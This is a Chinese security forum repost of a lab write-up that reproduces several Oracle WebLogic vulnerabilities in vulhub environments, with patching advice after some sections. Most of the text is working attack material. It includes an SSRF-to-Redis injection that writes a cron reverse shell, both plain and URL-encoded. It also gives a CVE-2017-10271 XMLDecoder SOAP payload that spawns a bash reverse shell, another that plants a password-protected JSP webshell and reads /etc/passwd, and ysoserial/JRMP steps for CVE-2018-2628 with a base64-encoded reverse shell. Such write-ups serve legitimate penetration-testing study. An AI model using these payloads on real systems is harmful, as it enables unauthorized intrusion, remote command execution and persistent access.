设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 基于Weblogic的一系列漏洞复现总结(一) ...
返回列表 发新帖
查看: 2842|回复: 0

基于Weblogic的一系列漏洞复现总结(一)

[复制链接]
gclome

991

主题

1063

帖子

4319

积分

论坛元老

Rank: 8Rank: 8

积分
4319
发表于 2022-2-20 11:32:49 | 显示全部楼层 |阅读模式
原文链接:基于Weblogic的一系列漏洞复现总结(一)


Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
影响版本
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 10.0.2.0
复现过程
启用vulhub漏洞环境
SSRF漏洞测试
访问http://192.168.14.128:7001/uddiexplorer/,无需登录即可查看uddiexplorer
应用。SSRF漏洞存在于:
http://192.168.14.128:7001/uddie ... ublicRegistries.jsp,在brupsuite下测试该漏洞。访问一个可以访问的IPORT,如http://127.0.0.1:7001

http://192.168.14.128:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

主要是通过operator这个参数来判断端口是否开放,例如访问开放的7001端口时页面会返回一个404。

当访问一个不存在的端口时,例如8888,则会回显如下内容。可通过错误的不同来探测内网状态。

如果访问的非http协议,则会返回did not have a valid SOAP content-type。
注入HTTP头,利用Redis反弹shell
(1)Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。
(2)通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)。Setup UDDI Explorer这个页面泄露了内网的网段,可以用burpsuite或者脚本来探测。这里由于是在本机上搭建的漏洞环境,因此显示的是localhost。实战中则会泄露真实内网IP。

redis默认开放的端口为6379,发现172.19.0.2:6379可以连通:

(3)发送三条redis命令,将反弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.14.130/8899 0>&1\n\n\n\n"config set dir /etc/config set dbfilename crontabsaveURL编码,绕过拦截。

%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%2e%31%33%30%2f%38%38%39%39%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0d%0a%73%61%76%65
换行符是“\r\n”,也就是“%0D%0A”。将url编码后的字符串放在ssrf的域名后面,发送:

http://172.19.0.2:6379/test%0D%0A%0D%0A%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%2e%31%33%30%2f%38%38%39%39%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0d%0a%73%61%76%65 HTTP/1.1

(4)开启监听端口,反弹shell成功

(5)可进行利用的cron有如下几个地方:
1./etc/crontab 这个是肯定的
2./etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
3./var/spool/cron/root ----centos系统下root用户的cron文件
4./var/spool/cron/crontabs/root ----debian系统下root用户的cron文件
漏洞描述
Weblogic_wls-wsat_XMLDecoder反序列化漏洞(CVE-2017-10271)
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
影响版本
10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0
复现过程
这里启用vulhub漏洞环境
反弹shell
(1)访问
http://10.10.10.130:7001/wls-wsat/CoordinatorPortType,burpsuite拦截数据包,以post方法发送如下poc。将listen_IP和port修改为监听地址和端口即可
  1. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
  2. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  3. <java version="1.4.0" class="java.beans.XMLDecoder">
  4. <void class="java.lang.ProcessBuilder">
  5. <array class="java.lang.String" length="3">
  6. <void index="0">
  7. <string>/bin/bash</string>
  8. </void>
  9. <void index="1">
  10. <string>-c</string>
  11. </void>
  12. <void index="2">
  13. <string>bash -i >& /dev/tcp/listen_IP/port 0>&1</string>
  14. </void>
  15. </array>
  16. <void method="start"/></void>
  17. </java>
  18. </work:WorkContext>
  19. </soapenv:Header>
  20. <soapenv:Body/>
  21. </soapenv:Envelope>
复制代码




(2)在发包前开启监听,成功反弹shell

nc -lvnp 8899

写入webshell


(1)访问http://10.10.10.130:7001/wls-wsat/CoordinatorPortType,burpsuite拦截数据包,以post方法发送poc。这里我上传的是带有密码回显的jsp一句话。注:上传的木马内容所在位置:<![CDATA["木马内容"]]>

  1. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  2. <soapenv:Header>
  3. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  4. <java><java version="1.4.0" class="java.beans.XMLDecoder">
  5. <object class="java.io.PrintWriter">
  6. <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/cmd.jsp</string>
  7. <void method="println"><string>
  8. <![CDATA[
  9. <%
  10. if("123".equals(request.getParameter("pwd"))){
  11. java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
  12. int a = -1;
  13. byte[] b = new byte[2048];
  14. out.print("<pre>");
  15. while((a=in.read(b))!=-1){
  16. out.println(new String(b));
  17. }
  18. out.print("</pre>");
  19. }
  20. %>
  21. ]]>
  22. </string>
  23. </void>
  24. <void method="close"/>
  25. </object></java></java>
  26. </work:WorkContext>
  27. </soapenv:Header>
  28. <soapenv:Body/>
  29. </soapenv:Envelope>
复制代码





(2)访问http://10.10.10.130:7001/bea_wls_internal/cmd.jsp,命令执行

http://10.10.10.130:7001/bea_wls_internal/cmd.jsp?pwd=123&cmd=cat /etc/passwd

修复建议
(1)下载Oracle推送补丁,下载地址如下
http://www.oracle.com/technetwor ... ct2017-3236626.html
(2)根据实际环境路径,删除WebLogicwls-wsat组件;删除相关文件后重启weblogic,保证访问wls-wsat提示404错误。
漏洞描述
weblogic_WLS-Core_Components反序列化命令执行漏洞(CVE-2018-2628)
该漏洞通过T3协议触发,可导致未授权的用户在远程执行任意命令。
影响版本
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3(项目列表)
复现过程
攻击IP:10.10.10.130
靶机IP:10.10.10.130:7001
漏洞利用工具包:https://github.com/Lighird/CVE-2018-2628
(1)启动vulhub漏洞环境。
(2)利用nmap检测目标资产,发现开放T3协议及WebLogic版本信息。

nmap -p 7001,7002 -v -n --script weblogic-t3-info 10.10.10.130

(3)利用CVE-2018-2628检测工具检测出目标存在漏洞

(4)在攻击机上启动JRMP Server,使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序
  1. java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener [listen port] Jdk7u21 [command]
  2. # [listen port] : JRMP Server监听的端口
  3. # [command] : 需要执行的命令
复制代码


(5)执行反弹shell命令

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -i >& /dev/tcp/10.10.10.130/8899 0>&1'
由于 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,因此需要进行一次编码。
PS:Runtime.getRuntime().exec 用于调用外部可执行程序或系统命令,并重定向外部程序的标准输入、标准输出和标准错误到缓冲池,编码后的命令如下:

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMzAvODg5OSAwPiYx}|{base64,-d}|{bash,-i}'

编码转换工具:https://www.jackson-t.ca/runtime-exec-payloads.html
(6)攻击机上新打开一个终端,执行

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 10.10.10.130:8888 | xxd -p | tr -d $'\n' && echo

(7)复制以上输出结果,替换weblogic_poc.py 中的PYLOAD,并将dip参数改为目标IP


(8)攻击机上新开一个终端窗口,利用nc监听8899端口,再开一个终端窗口运行weblogic_poc.py,即可反弹shell


  3. python weblogic_poc.py

  5. [点击并拖拽以移动]

  7. 修复建议

  9. (1)安装官方补丁:

  11. https://www.oracle.com/security-alerts/cpujul2020.html
  12. (2)限制T3访问来源。漏洞产生于WebLogic默认启用的T3协议,因此可通过限制T3访问来源来阻止攻击。
  13. (3)禁用IIOP协议,可以查看下面官方文章进行关闭IIOP协议。
  14. https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html​
复制代码











回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-7-22 00:08 , Processed in 0.017799 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表